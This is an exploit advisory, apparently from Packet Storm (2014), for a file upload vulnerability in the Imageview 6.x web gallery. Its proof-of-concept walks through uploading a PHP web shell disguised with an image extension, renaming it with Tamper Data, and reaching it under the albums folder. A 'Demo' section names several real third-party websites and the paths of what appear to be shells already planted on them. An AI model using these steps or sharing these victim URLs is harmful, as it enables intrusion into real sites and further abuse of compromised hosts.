Imageview 6.x Shell Upload

2014-01-21T00:00:00
ID PACKETSTORM:124865
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-21T00:00:00

Description

                                        
`[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Imageview File Upload vulnerability  
[+] Date: 20-01-2014  
[+] Category: WebApp  
[+] Google Dork: :  
[+] Tested on: Kali Linux  
[+] Friendly Sites: na3il.com,th3-creative.com  
#############################################################  
+Exploit:  
Imageview suffers from a file upload vulnerability which allows an attacker  
to upload a PHP file.  
  
+P.O.C:  
127.0.0.1/[PATH]/upload.php  
Upload as shell.php.[img extension jpg png gif]  
Change it using Tamper Data  
Shell Path:  
127.0.0.1/[PATH]/albums/shell.php  
  
+Demo:  
http://indianayouthballet.com/photos/upload.php  
http://indianayouthballet.com/photos/albums/a0a0a.php  
http://www.schaefer-swantow.de/Galerie/upload.php  
http://www.schaefer-swantow.de/Galerie/albums/c99.php  
http://www.rappel-zappel.de/galerie/upload.php  
  
+Fix:  
There is no fix from the script's owner; as a workaround, change the name or path of "upload.php".  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`